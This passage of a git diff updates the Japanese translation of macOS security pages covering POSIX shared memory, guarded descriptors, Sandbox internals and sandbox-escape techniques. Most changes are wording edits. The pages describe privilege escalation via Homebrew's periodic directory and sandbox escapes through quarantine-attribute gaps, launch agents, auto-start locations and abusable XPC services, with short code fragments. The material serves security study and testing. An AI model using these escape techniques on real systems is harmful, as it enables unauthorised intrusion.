-これは、私が書き込み可能なrootに属するファイルを生成します([**ここからのコード**](https://github.com/gergelykalman/brew-lpe-via-periodic/blob/main/brew_lpe.sh))。これは特権昇格としても機能する可能性があります。
+これは、私が書き込み可能なrootに属するファイルを生成します([**ここからのコード**](https://github.com/gergelykalman/brew-lpe-via-periodic/blob/main/brew_lpe.sh))。これは特権昇格としても機能する可能性があります:
 ```bash
 DIRNAME=/usr/local/etc/periodic/daily
 
@@ -326,7 +326,7 @@ echo $FILENAME
 ```
 ## POSIX共有メモリ
 
-**POSIX共有メモリ**は、POSIX準拠のオペレーティングシステムにおいてプロセスが共通のメモリ領域にアクセスできるようにし、他のプロセス間通信方法と比較してより迅速な通信を促進します。これは、`shm_open()`を使用して共有メモリオブジェクトを作成または開き、`ftruncate()`でそのサイズを設定し、`mmap()`を使用してプロセスのアドレス空間にマッピングすることを含みます。プロセスはこのメモリ領域から直接読み書きできます。並行アクセスを管理し、データの破損を防ぐために、ミューテックスやセマフォなどの同期メカニズムがよく使用されます。最後に、プロセスは`munmap()`と`close()`で共有メモリをアンマップおよび閉じ、オプションで`shm_unlink()`でメモリオブジェクトを削除します。このシステムは、複数のプロセスが迅速に共有データにアクセスする必要がある環境で、効率的で迅速なIPCに特に効果的です。
+**POSIX共有メモリ**は、POSIX準拠のオペレーティングシステムにおいて、プロセスが共通のメモリ領域にアクセスできるようにし、他のプロセス間通信方法と比較してより迅速な通信を可能にします。これは、`shm_open()`を使用して共有メモリオブジェクトを作成または開き、`ftruncate()`でそのサイズを設定し、`mmap()`を使用してプロセスのアドレス空間にマッピングすることを含みます。プロセスはこのメモリ領域から直接読み書きできます。並行アクセスを管理し、データの破損を防ぐために、ミューテックスやセマフォなどの同期メカニズムがよく使用されます。最後に、プロセスは`munmap()`と`close()`で共有メモリをアンマップおよび閉じ、オプションで`shm_unlink()`でメモリオブジェクトを削除します。このシステムは、複数のプロセスが迅速に共有データにアクセスする必要がある環境で、効率的で迅速なIPCに特に効果的です。
 
 

 
@@ -424,7 +424,7 @@ return 0;
 
 **macOS ガード付きディスクリプタ**は、ユーザーアプリケーションにおける**ファイルディスクリプタ操作**の安全性と信頼性を向上させるためにmacOSに導入されたセキュリティ機能です。これらのガード付きディスクリプタは、ファイルディスクリプタに特定の制限や「ガード」を関連付ける方法を提供し、カーネルによって強制されます。
 
-この機能は、**不正なファイルアクセス**や**レースコンディション**などの特定のクラスのセキュリティ脆弱性を防ぐのに特に役立ちます。これらの脆弱性は、例えばスレッドがファイルディスクリプタにアクセスしているときに**別の脆弱なスレッドがそれにアクセスできる**場合や、ファイルディスクリプタが**脆弱な子プロセスに継承される**場合に発生します。この機能に関連するいくつかの関数は次のとおりです:
+この機能は、**不正なファイルアクセス**や**レースコンディション**などの特定のクラスのセキュリティ脆弱性を防ぐのに特に役立ちます。これらの脆弱性は、たとえば、スレッドがファイルディスクリプタにアクセスして**別の脆弱なスレッドにアクセスを許可する**場合や、ファイルディスクリプタが**脆弱な子プロセスに継承される**場合に発生します。この機能に関連するいくつかの関数は次のとおりです:
 
 - `guarded_open_np`: ガード付きでFDをオープン
 - `guarded_close_np`: 閉じる
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/README.md
index ea9533878..8527d2d1e 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/README.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/README.md
@@ -4,13 +4,13 @@
 
 ## 基本情報
 
-MacOS Sandbox(最初はSeatbeltと呼ばれていました)は、**サンドボックス内で実行されるアプリケーションを、アプリが実行されているサンドボックスプロファイルで指定された**許可されたアクションに**制限します**。これにより、**アプリケーションが予期されるリソースのみをアクセスすることが保証されます**。
+MacOS Sandbox(最初はSeatbeltと呼ばれていました)は、**サンドボックス内で実行されるアプリケーション**を、アプリが実行されている**サンドボックスプロファイルで指定された許可されたアクション**に制限します。これにより、**アプリケーションが予期されるリソースのみをアクセスすることが保証されます**。
 
-**`com.apple.security.app-sandbox`**という**権限**を持つアプリは、サンドボックス内で実行されます。**Appleのバイナリ**は通常サンドボックス内で実行され、**App Storeのすべてのアプリケーションはその権限を持っています**。したがって、いくつかのアプリケーションはサンドボックス内で実行されます。
+**`com.apple.security.app-sandbox`**という**権限**を持つアプリは、サンドボックス内で実行されます。**Appleのバイナリ**は通常サンドボックス内で実行され、**App Store**のすべてのアプリケーションはその権限を持っています。したがって、いくつかのアプリケーションはサンドボックス内で実行されます。
 
-プロセスが何をできるか、またはできないかを制御するために、**サンドボックスはほぼすべての操作にフックを持っています**(ほとんどのシステムコールを含む)**MACF**を使用しています。しかし、アプリの**権限**に応じて、サンドボックスはプロセスに対してより許可的になる場合があります。
+プロセスが何をできるか、またはできないかを制御するために、**サンドボックスはほぼすべての操作にフック**を持っています(ほとんどのシステムコールを含む)**MACF**を使用しています。ただし、アプリの**権限**に応じて、サンドボックスはプロセスに対してより許可的になる場合があります。
 
-サンドボックスの重要なコンポーネントは以下の通りです:
+サンドボックスの重要なコンポーネントは次のとおりです:
 
 - **カーネル拡張** `/System/Library/Extensions/Sandbox.kext`
 - **プライベートフレームワーク** `/System/Library/PrivateFrameworks/AppSandbox.framework`
@@ -54,9 +54,9 @@ drwx------   2 username  staff    64 Mar 24 18:02 SystemData
 drwx------   2 username  staff    64 Mar 24 18:02 tmp
 ```
 > [!CAUTION]
-> サンドボックスから「脱出」して他のフォルダにアクセスするためにシンボリックリンクがあっても、アプリはそれらにアクセスするための**権限を持っている必要があります**。これらの権限は`RedirectablePaths`の**`.plist`**内にあります。
+> 注意してください。シンボリックリンクがSandboxから「脱出」して他のフォルダにアクセスするために存在していても、アプリはそれらにアクセスするための**権限を持っている必要があります**。これらの権限は`RedirectablePaths`の**`.plist`**内にあります。
 
-**`SandboxProfileData`**は、B64にエスケープされたコンパイル済みサンドボックスプロファイルCFDataです。
+**`SandboxProfileData`**は、B64にエスケープされたコンパイル済みのサンドボックスプロファイルCFDataです。
 ```bash
 # Get container config
 ## You need FDA to access the file, not even just root can read it
@@ -106,13 +106,13 @@ AAAhAboBAAAAAAgAAABZAO4B5AHjBMkEQAUPBSsGPwsgASABHgEgASABHwEf...
 [...]
 ```
 > [!WARNING]
-> サンドボックスアプリケーションによって作成または変更されたすべてのものには、**隔離属性**が付与されます。これは、サンドボックスアプリが**`open`**を使用して何かを実行しようとした場合に、Gatekeeperをトリガーすることによってサンドボックス空間を防ぎます。
+> サンドボックスアプリケーションによって作成または変更されたすべてのものには、**隔離属性**が付与されます。これは、サンドボックスアプリが**`open`**を使用して何かを実行しようとした場合に、Gatekeeperをトリガーしてサンドボックススペースを防ぐことになります。
 
 ## サンドボックスプロファイル
 
 サンドボックスプロファイルは、その**サンドボックス**で何が**許可/禁止**されるかを示す設定ファイルです。これは、[**Scheme**]()プログラミング言語を使用する**サンドボックスプロファイル言語(SBPL)**を使用します。
 
-ここに例があります:
+ここに例があります:
 ```scheme
 (version 1) ; First you get the version
 
@@ -131,15 +131,15 @@ AAAhAboBAAAAAAgAAABZAO4B5AHjBMkEQAUPBSsGPwsgASABHgEgASABHwEf...
 )
 ```
 > [!TIP]
-> この[**研究**](https://reverse.put.as/2011/09/14/apple-sandbox-guide-v1-0/)を確認して、許可または拒否される可能性のあるアクションを確認してください。
+> この[**研究**](https://reverse.put.as/2011/09/14/apple-sandbox-guide-v1-0/)を確認して、許可または拒否される可能性のあるアクションをさらに確認してください。
 >
-> プロファイルのコンパイル版では、操作の名前がdylibおよびkextによって知られている配列のエントリに置き換えられ、コンパイル版が短く、読みづらくなります。
+> プロファイルのコンパイル版では、操作の名前がdylibおよびkextによって知られる配列のエントリに置き換えられ、コンパイル版が短く、読みづらくなります。
 
 重要な**システムサービス**も、`mdnsresponder`サービスのように独自のカスタム**サンドボックス**内で実行されます。これらのカスタム**サンドボックスプロファイル**は以下で確認できます:
 
 - **`/usr/share/sandbox`**
 - **`/System/Library/Sandbox/Profiles`**
-- 他のサンドボックスプロファイルは[https://github.com/s7ephen/OSX-Sandbox--Seatbelt--Profiles](https://github.com/s7ephen/OSX-Sandbox--Seatbelt--Profiles)で確認できます。
+- その他のサンドボックスプロファイルは[https://github.com/s7ephen/OSX-Sandbox--Seatbelt--Profiles](https://github.com/s7ephen/OSX-Sandbox--Seatbelt--Profiles)で確認できます。
 
 **App Store**アプリは**プロファイル****`/System/Library/Sandbox/Profiles/application.sb`**を使用します。このプロファイルで、**`com.apple.security.network.server`**のような権限がプロセスにネットワークを使用することを許可する方法を確認できます。
 
@@ -199,13 +199,13 @@ log show --style syslog --predicate 'eventMessage contains[c] "sandbox"' --last
 {{#endtab}}
 {{#endtabs}}
 
-> [!NOTE]
-> **Apple**が作成した**ソフトウェア**は**Windows**上で**追加のセキュリティ対策**を持っていないことに注意してください。アプリケーションサンドボックスなど。
+> [!TIP]
+> **Appleが作成した** **ソフトウェア**は、**Windows**上で**追加のセキュリティ対策**、例えばアプリケーションサンドボックスがありません。
 
 バイパスの例:
 
 - [https://lapcatsoftware.com/articles/sandbox-escape.html](https://lapcatsoftware.com/articles/sandbox-escape.html)
-- [https://desi-jarvis.medium.com/office365-macos-sandbox-escape-fcce4fa4123c](https://desi-jarvis.medium.com/office365-macos-sandbox-escape-fcce4fa4123c)(彼らは`~$`で始まる名前のファイルをサンドボックスの外に書き込むことができます)。
+- [https://desi-jarvis.medium.com/office365-macos-sandbox-escape-fcce4fa4123c](https://desi-jarvis.medium.com/office365-macos-sandbox-escape-fcce4fa4123c) (彼らは`~$`で始まる名前のファイルをサンドボックスの外に書き込むことができます)。
 
 ### サンドボックストレース
 
@@ -216,18 +216,18 @@ log show --style syslog --predicate 'eventMessage contains[c] "sandbox"' --last
 (version 1)
 (trace /tmp/trace.out)
 ```
-その後、そのプロファイルを使用して何かを実行します:
+そのプロファイルを使用して何かを実行します:
 ```bash
 sandbox-exec -f /tmp/trace.sb /bin/ls
 ```
-`/tmp/trace.out` では、呼び出されるたびに実行された各サンドボックスチェックを見ることができます(つまり、多くの重複があります)。
+`/tmp/trace.out` では、呼び出されるたびに実行される各サンドボックスチェックを見ることができます(つまり、多くの重複があります)。
 
 **`-t`** パラメータを使用してサンドボックスをトレースすることも可能です: `sandbox-exec -t /path/trace.out -p "(version 1)" /bin/ls`
 
 #### API経由
 
-`libsystem_sandbox.dylib` にエクスポートされた関数 `sandbox_set_trace_path` は、サンドボックスチェックが書き込まれるトレースファイル名を指定することを可能にします。\
-`sandbox_vtrace_enable()` を呼び出し、その後 `sandbox_vtrace_report()` を呼び出してバッファからログエラーを取得することでも、同様のことが可能です。
+`libsystem_sandbox.dylib` にエクスポートされている関数 `sandbox_set_trace_path` は、サンドボックスチェックが書き込まれるトレースファイル名を指定することを可能にします。\
+`sandbox_vtrace_enable()` を呼び出し、その後 `sandbox_vtrace_report()` を呼び出すことでバッファからログエラーを取得することも可能です。
 
 ### サンドボックス検査
 
@@ -235,7 +235,7 @@ sandbox-exec -f /tmp/trace.sb /bin/ls
 
 ### MacOS & iOS サンドボックスプロファイル
 
-MacOS は、システムサンドボックスプロファイルを **/usr/share/sandbox/** と **/System/Library/Sandbox/Profiles** の2つの場所に保存します。
+MacOS は、システムサンドボックスプロファイルを2つの場所に保存します: **/usr/share/sandbox/** と **/System/Library/Sandbox/Profiles**。
 
 サードパーティアプリケーションが _**com.apple.security.app-sandbox**_ 権限を持っている場合、システムはそのプロセスに **/System/Library/Sandbox/Profiles/application.sb** プロファイルを適用します。
 
@@ -243,7 +243,7 @@ iOS では、デフォルトプロファイルは **container** と呼ばれ、S
 
 ### App Store アプリのカスタム SBPL
 
-企業が **カスタムサンドボックスプロファイル** でアプリを実行することが可能かもしれません(デフォルトのものではなく)。彼らは、Apple によって承認される必要がある **`com.apple.security.temporary-exception.sbpl`** 権限を使用する必要があります。
+企業がアプリを **カスタムサンドボックスプロファイル** で実行することが可能です(デフォルトのものではなく)。彼らは **`com.apple.security.temporary-exception.sbpl`** 権限を使用する必要があり、これは Apple によって承認される必要があります。
 
 この権限の定義は **`/System/Library/Sandbox/Profiles/application.sb:`** で確認できます。
 ```scheme
@@ -253,21 +253,21 @@ iOS では、デフォルトプロファイルは **container** と呼ばれ、S
 (let* ((port (open-input-string string)) (sbpl (read port)))
 (with-transparent-redirection (eval sbpl)))))
 ```
-この権限の後の文字列は、Sandboxプロファイルとして**eval**されます。
+この権限の後の文字列を**eval**し、Sandboxプロファイルとして扱います。
 
 ### Sandboxプロファイルのコンパイルとデコンパイル
 
 **`sandbox-exec`**ツールは、`libsandbox.dylib`の`sandbox_compile_*`関数を使用します。エクスポートされる主な関数は次のとおりです:`sandbox_compile_file`(ファイルパスを期待、パラメータ`-f`)、`sandbox_compile_string`(文字列を期待、パラメータ`-p`)、`sandbox_compile_name`(コンテナの名前を期待、パラメータ`-n`)、`sandbox_compile_entitlements`(権限plistを期待)。
 
-この逆コンパイルされた[**オープンソース版のsandbox-execツール**](https://newosxbook.com/src.jl?tree=listings&file=/sandbox_exec.c)は、**`sandbox-exec`**がコンパイルされたSandboxプロファイルをファイルに書き込むことを可能にします。
+この逆コンパイルされた[**sandbox-execツールのオープンソース版**](https://newosxbook.com/src.jl?tree=listings&file=/sandbox_exec.c)は、**`sandbox-exec`**がコンパイルされたSandboxプロファイルをファイルに書き込むことを可能にします。
 
-さらに、プロセスをコンテナ内に制限するために、`sandbox_spawnattrs_set[container/profilename]`を呼び出し、コンテナまたは既存のプロファイルを渡すことがあります。
+さらに、コンテナ内でプロセスを制限するために、`sandbox_spawnattrs_set[container/profilename]`を呼び出し、コンテナまたは既存のプロファイルを渡すことがあります。
 
 ## Sandboxのデバッグとバイパス
 
-macOSでは、プロセスがカーネルによって最初からサンドボックス化されるiOSとは異なり、**プロセスは自らサンドボックスに参加する必要があります**。これは、macOSではプロセスが積極的にサンドボックスに入ることを決定するまで、サンドボックスによって制限されないことを意味しますが、App Storeアプリは常にサンドボックス化されています。
+macOSでは、iOSとは異なり、プロセスはカーネルによって最初からサンドボックス化されているわけではなく、**プロセスは自らサンドボックスに参加する必要があります**。これは、macOSではプロセスが積極的にサンドボックスに入ることを決定するまで、サンドボックスによって制限されないことを意味しますが、App Storeアプリは常にサンドボックス化されています。
 
-プロセスは、権限`com.apple.security.app-sandbox`を持っている場合、ユーザーランドから自動的にサンドボックス化されます。このプロセスの詳細な説明については、次を確認してください:
+プロセスは、権限`com.apple.security.app-sandbox`を持っている場合、ユーザーランドから自動的にサンドボックス化されます。このプロセスの詳細な説明については、以下を確認してください:
 
 {{#ref}}
 macos-sandbox-debug-and-bypass/
@@ -275,7 +275,7 @@ macos-sandbox-debug-and-bypass/
 
 ## **Sandbox拡張**
 
-拡張はオブジェクトにさらなる権限を与えることを可能にし、次の関数のいずれかを呼び出すことで与えられます:
+拡張はオブジェクトにさらなる権限を与えることを可能にし、次の関数のいずれかを呼び出すことで行われます:
 
 - `sandbox_issue_extension`
 - `sandbox_extension_issue_file[_with_new_type]`
@@ -354,25 +354,25 @@ iOSでは、カーネル拡張が`__TEXT.__const`セグメント内に**すべ
 
 - **`hook_policy_init`**: `mpo_policy_init`をフックし、`mac_policy_register`の後に呼び出されます。サンドボックスの初期化のほとんどを実行します。また、SIPも初期化します。
 - **`hook_policy_initbsd`**: `security.mac.sandbox.sentinel`、`security.mac.sandbox.audio_active`、および`security.mac.sandbox.debug_mode`を登録するsysctlインターフェースを設定します(`PE_i_can_has_debugger`でブートされた場合)。
-- **`hook_policy_syscall`**: "Sandbox"を最初の引数、操作を示すコードを2番目の引数として`mac_syscall`によって呼び出されます。スイッチを使用して、要求されたコードに応じて実行するコードを見つけます。
+- **`hook_policy_syscall`**: "Sandbox"を最初の引数として、操作を示すコードを2番目の引数として`mac_syscall`によって呼び出されます。要求されたコードに応じて実行するコードを見つけるためにスイッチが使用されます。
 
 ### MACF Hooks
 
-**`Sandbox.kext`**は、MACFを介して100以上のフックを使用します。ほとんどのフックは、アクションを実行できるかどうかを確認するための些細なケースをチェックし、そうでない場合は**`cred_sb_evalutate`**を呼び出し、**操作**を実行するための**資格情報**と**出力**用の**バッファ**を渡します。
+**`Sandbox.kext`**は、MACFを介して100以上のフックを使用しています。ほとんどのフックは、アクションを実行できるかどうかを確認するための些細なケースをチェックし、そうでない場合は**`cred_sb_evalutate`**を呼び出し、**操作**を実行するための**資格情報**と出力用の**バッファ**を渡します。
 
-その良い例が、**`_mpo_file_check_mmap`**関数で、これは**`mmap`**をフックし、新しいメモリが書き込み可能かどうかをチェックし(そうでない場合は実行を許可)、次にそれがdyld共有キャッシュに使用されているかどうかをチェックし、そうであれば実行を許可し、最後に**`sb_evaluate_internal`**(またはそのラッパーの1つ)を呼び出してさらなる許可チェックを実行します。
+その良い例が、フックされた**`_mpo_file_check_mmap`**関数で、これは**`mmap`**をフックし、新しいメモリが書き込み可能かどうかをチェックし(そうでない場合は実行を許可)、次にそれがdyld共有キャッシュに使用されているかどうかをチェックし、そうであれば実行を許可し、最後に**`sb_evaluate_internal`**(またはそのラッパーの1つ)を呼び出してさらなる許可チェックを実行します。
 
 さらに、サンドボックスが使用する数百のフックの中で、特に興味深い3つがあります。
 
-- `mpo_proc_check_for`: 必要に応じてプロファイルを適用し、以前に適用されていない場合。
+- `mpo_proc_check_for`: 必要に応じてプロファイルを適用し、以前に適用されていなかった場合。
 - `mpo_vnode_check_exec`: プロセスが関連するバイナリをロードするときに呼び出され、プロファイルチェックとSUID/SGID実行を禁止するチェックが行われます。
 - `mpo_cred_label_update_execve`: ラベルが割り当てられるときに呼び出されます。これは、バイナリが完全にロードされるがまだ実行されていないときに呼び出されるため、最も長いものです。サンドボックスオブジェクトの作成、kauth資格情報へのサンドボックス構造の添付、machポートへのアクセスの削除などのアクションを実行します。
 
-**`_cred_sb_evalutate`**は**`sb_evaluate_internal`**のラッパーであり、この関数は渡された資格情報を取得し、次に**`eval`**関数を使用して評価を実行します。この関数は通常、すべてのプロセスにデフォルトで適用される**プラットフォームプロファイル**を評価し、その後**特定のプロセスプロファイル**を評価します。プラットフォームプロファイルは、macOSの**SIP**の主要なコンポーネントの1つです。
+**`_cred_sb_evalutate`**は**`sb_evaluate_internal`**のラッパーであり、この関数は渡された資格情報を取得し、次に**`eval`**関数を使用して評価を実行します。この関数は通常、すべてのプロセスにデフォルトで適用される**プラットフォームプロファイル**を評価し、その後**特定のプロセスプロファイル**を評価します。プラットフォームプロファイルは、macOSの**SIP**の主要なコンポーネントの1つであることに注意してください。
 
 ## Sandboxd
 
-サンドボックスには、XPC Machサービス`com.apple.sandboxd`を公開し、カーネル拡張が通信に使用する特別なポート14(`HOST_SEATBELT_PORT`)をバインドするユーザーデーモンもあります。MIGを使用していくつかの関数を公開します。
+サンドボックスには、XPC Machサービス`com.apple.sandboxd`を公開し、カーネル拡張が通信に使用する特別なポート14(`HOST_SEATBELT_PORT`)をバインドするユーザーデーモンもあります。MIGを使用していくつかの関数を公開しています。
 
 ## References
 
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md
index 2e32acbac..d1fc6c63f 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md
@@ -6,29 +6,29 @@
 
 
Image from http://newosxbook.com/files/HITSB.pdf

 
-前の画像では、**アプリケーションが権限** **`com.apple.security.app-sandbox`** **を持っている場合、サンドボックスがどのように読み込まれるか**を観察できます。
+前の画像では、**`com.apple.security.app-sandbox`** の権限を持つアプリケーションが実行されるときに**サンドボックスがどのようにロードされるか**を観察できます。
 
-コンパイラは、バイナリに`/usr/lib/libSystem.B.dylib`をリンクします。
+コンパイラはバイナリに `/usr/lib/libSystem.B.dylib` をリンクします。
 
-次に、**`libSystem.B`**は他のいくつかの関数を呼び出し、**`xpc_pipe_routine`**がアプリの権限を**`securityd`**に送信します。Securitydは、プロセスがサンドボックス内で隔離されるべきかどうかを確認し、そうであれば隔離します。\
-最後に、サンドボックスは**`__sandbox_ms`**への呼び出しでアクティブ化され、**`__mac_syscall`**が呼び出されます。
+その後、**`libSystem.B`** は他のいくつかの関数を呼び出し、**`xpc_pipe_routine`** がアプリの権限を **`securityd`** に送信します。Securitydはプロセスがサンドボックス内で隔離されるべきかどうかを確認し、そうであれば隔離します。\
+最後に、サンドボックスは **`__sandbox_ms`** への呼び出しによってアクティブ化され、これが **`__mac_syscall`** を呼び出します。
 
 ## Possible Bypasses
 
 ### Bypassing quarantine attribute
 
-**サンドボックス化されたプロセスによって作成されたファイル**には、サンドボックスからの脱出を防ぐために**隔離属性**が追加されます。しかし、もしあなたが**隔離属性なしで`.app`フォルダを作成することができれば**、アプリバンドルのバイナリを**`/bin/bash`**にポイントさせ、**plist**にいくつかの環境変数を追加して**`open`**を悪用し、**新しいアプリをサンドボックスなしで起動**することができます。
+**サンドボックス化されたプロセスによって作成されたファイル** には、サンドボックスからの脱出を防ぐために**隔離属性**が追加されます。しかし、もしあなたが**隔離属性なしで `.app` フォルダを作成することができれば**、アプリバンドルのバイナリを **`/bin/bash`** にポイントさせ、**plist** にいくつかの環境変数を追加して **`open`** を悪用し、**新しいアプリをサンドボックスなしで起動する**ことができます。
 
-これは[**CVE-2023-32364**](https://gergelykalman.com/CVE-2023-32364-a-macOS-sandbox-escape-by-mounting.html)**で行われました。**
+これは [**CVE-2023-32364**](https://gergelykalman.com/CVE-2023-32364-a-macOS-sandbox-escape-by-mounting.html)** で行われたことです。**
 
 > [!CAUTION]
-> したがって、現時点では、**隔離属性なしで`.app`**で終わる名前のフォルダを作成できる場合、サンドボックスから脱出できます。なぜなら、macOSは**`.app`フォルダ**と**メイン実行可能ファイル**の**隔離**属性のみを**チェック**するからです(そして、私たちはメイン実行可能ファイルを**`/bin/bash`**にポイントさせます)。
+> したがって、現時点では、**隔離属性なしで `.app`** で終わる名前のフォルダを作成できる場合、サンドボックスから脱出できます。なぜなら、macOSは**`.app` フォルダ**と**メイン実行可能ファイル**の**隔離**属性のみを**チェック**するからです(そして、私たちはメイン実行可能ファイルを **`/bin/bash`** にポイントさせます)。
 >
-> すでに実行を許可された.appバンドル(実行を許可するフラグが付いた隔離xttrを持つ)も悪用できます... ただし、今は**`.app`**バンドル内に書き込むことはできません。特権TCC権限がない限り(サンドボックス内では持っていません)。
+> すでに実行を許可された .app バンドル(実行を許可されたフラグが付いた隔離属性を持つ)についても悪用できる可能性があります... ただし、今は**`.app`** バンドル内に書き込むことはできません。なぜなら、サンドボックス内では特権TCC権限を持っていないからです(高いサンドボックス内では持っていません)。
 
 ### Abusing Open functionality
 
-[**Wordサンドボックスバイパスの最後の例**](macos-office-sandbox-bypasses.md#word-sandbox-bypass-via-login-items-and-.zshenv)では、**`open`** CLI機能がサンドボックスをバイパスするために悪用される様子が確認できます。
+[**Wordサンドボックスバイパスの最後の例**](macos-office-sandbox-bypasses.md#word-sandbox-bypass-via-login-items-and-.zshenv)では、**`open`** CLI機能がサンドボックスをバイパスするためにどのように悪用されるかが示されています。
 
 {{#ref}}
 macos-office-sandbox-bypasses.md
@@ -36,16 +36,16 @@ macos-office-sandbox-bypasses.md
 
 ### Launch Agents/Daemons
 
-アプリケーションが**サンドボックス化されることを意図している**(`com.apple.security.app-sandbox`)場合でも、例えば**LaunchAgent**(`~/Library/LaunchAgents`)から実行される場合、サンドボックスをバイパスすることが可能です。\
+アプリケーションが**サンドボックス化されることを意図している** (`com.apple.security.app-sandbox`)場合でも、例えば**LaunchAgent** (`~/Library/LaunchAgents`)から実行される場合、サンドボックスをバイパスすることが可能です。\
 [**この投稿**](https://www.vicarius.io/vsociety/posts/cve-2023-26818-sandbox-macos-tcc-bypass-w-telegram-using-dylib-injection-part-2-3?q=CVE-2023-26818)で説明されているように、サンドボックス化されたアプリケーションで永続性を得たい場合、LaunchAgentとして自動的に実行されるようにし、DyLib環境変数を介して悪意のあるコードを注入することができます。
 
 ### Abusing Auto Start Locations
 
-サンドボックス化されたプロセスが**後にサンドボックスなしで実行されるアプリケーションがバイナリを実行する場所に**書き込むことができれば、**そこにバイナリを置くだけで脱出**できます。この種の場所の良い例は`~/Library/LaunchAgents`や`/System/Library/LaunchDaemons`です。
+サンドボックス化されたプロセスが**書き込むことができる場所**に**後でサンドボックスなしのアプリケーションがバイナリを実行する**場合、そこにバイナリを配置するだけで**脱出**できます。この種の場所の良い例は `~/Library/LaunchAgents` や `/System/Library/LaunchDaemons` です。
 
-これには**2ステップ**が必要な場合があります:**より許可されたサンドボックス**(`file-read*`、`file-write*`)を持つプロセスを作成し、そのプロセスが実際に**サンドボックスなしで実行される場所に書き込む**コードを実行します。
+これには**2ステップ**が必要な場合があります:**より許可されたサンドボックス** (`file-read*`, `file-write*`)を持つプロセスを実行して、実際に**サンドボックスなしで実行される場所に書き込む**コードを実行します。
 
-**Auto Start locations**についてはこのページを確認してください:
+**Auto Start locations**についてのこのページを確認してください:
 
 {{#ref}}
 ../../../../macos-auto-start-locations.md
@@ -53,7 +53,7 @@ macos-office-sandbox-bypasses.md
 
 ### Abusing other processes
 
-サンドボックスプロセスから、**制限の少ない(または全くない)他のプロセスを妥協**できれば、それらのサンドボックスに脱出することができます:
+サンドボックスプロセスから、**制限の少ない(または全くない)他のプロセスを妥協する**ことができれば、それらのサンドボックスに脱出することができます:
 
 {{#ref}}
 ../../../macos-proces-abuse/
@@ -61,11 +61,11 @@ macos-office-sandbox-bypasses.md
 
 ### Available System and User Mach services
 
-サンドボックスは、プロファイル`application.sb`で定義された特定の**Machサービス**と通信することも許可します。これらのサービスの1つを**悪用**できれば、**サンドボックスから脱出**できるかもしれません。
+サンドボックスは、プロファイル `application.sb` で定義された特定の**Machサービス**と通信することも許可します。これらのサービスの1つを**悪用**できれば、**サンドボックスから脱出**できるかもしれません。
 
-[この書き込み](https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/)で示されているように、Machサービスに関する情報は`/System/Library/xpc/launchd.plist`に保存されています。`System`および`User`をそのファイル内で検索することで、すべてのシステムおよびユーザMachサービスを見つけることができます。
+[この書き込み](https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/)で示されているように、Machサービスに関する情報は `/System/Library/xpc/launchd.plist` に保存されています。`System` と `User` をそのファイル内で検索することで、すべてのシステムおよびユーザMachサービスを見つけることができます。
 
-さらに、`bootstrap_look_up`を呼び出すことで、サンドボックス化されたアプリケーションに利用可能なMachサービスがあるかどうかを確認できます。
+さらに、`bootstrap_look_up` を呼び出すことで、サンドボックス化されたアプリケーションに利用可能なMachサービスを確認することができます。
 ```objectivec
 void checkService(const char *serviceName) {
 mach_port_t service_port = MACH_PORT_NULL;
@@ -90,7 +90,7 @@ checkService(serviceName.UTF8String);
 ```
 ### 利用可能なPID Machサービス
 
-これらのMachサービスは、最初にこの[サンドボックスからの脱出に利用されました](https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/)。その時点で、**アプリケーションとそのフレームワークによって必要とされるすべてのXPCサービス**がアプリのPIDドメイン内で表示されていました(これらは`ServiceType`が`Application`のMachサービスです)。
+これらのMachサービスは、最初に[この文書でサンドボックスから脱出するために悪用されました](https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/)。その時点で、**アプリケーションとそのフレームワークによって必要とされるすべてのXPCサービス**は、アプリのPIDドメイン内で表示されていました(これらは`ServiceType`が`Application`のMachサービスです)。
 
 **PIDドメインXPCサービスに連絡するためには**、アプリ内で次のような行を使って登録するだけで済みます:
 ```objectivec
@@ -98,12 +98,12 @@ checkService(serviceName.UTF8String);
 ```
 さらに、`System/Library/xpc/launchd.plist` 内で `Application` を検索することで、すべての **Application** Mach サービスを見つけることができます。
 
-有効な xpc サービスを見つける別の方法は、次の場所を確認することです:
+有効な xpc サービスを見つける別の方法は、次の場所を確認することです:
 ```bash
 find /System/Library/Frameworks -name "*.xpc"
 find /System/Library/PrivateFrameworks -name "*.xpc"
 ```
-この技術を悪用したいくつかの例は[**元のレポート**](https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/)に見つけることができますが、以下は要約された例です。
+この技術を悪用したいくつかの例は[**元の解説**](https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/)に見つけることができますが、以下は要約された例です。
 
 #### /System/Library/PrivateFrameworks/StorageKit.framework/XPCServices/storagekitfsrunner.xpc
 
@@ -132,7 +132,7 @@ NSLog(@"run task result:%@, error:%@", bSucc, error);
 
 このXPCサービスは、常にYESを返すことで、すべてのクライアントを許可し、メソッド`createZipAtPath:hourThreshold:withReply:`は、圧縮するフォルダのパスを指定することを基本的に許可しました。そして、それはZIPファイルに圧縮されます。
 
-したがって、偽のアプリフォルダ構造を生成し、それを圧縮し、次に解凍して実行することで、サンドボックスを脱出することが可能です。新しいファイルには検疫属性がないためです。
+したがって、偽のアプリフォルダ構造を生成し、それを圧縮し、次に解凍して実行することで、サンドボックスを脱出することが可能です。新しいファイルには検疫属性が付与されないためです。
 
 エクスプロイトは:
 ```objectivec
@@ -173,7 +173,7 @@ break;
 ```
 #### /System/Library/PrivateFrameworks/WorkflowKit.framework/XPCServices/ShortcutsFileAccessHelper.xpc
 
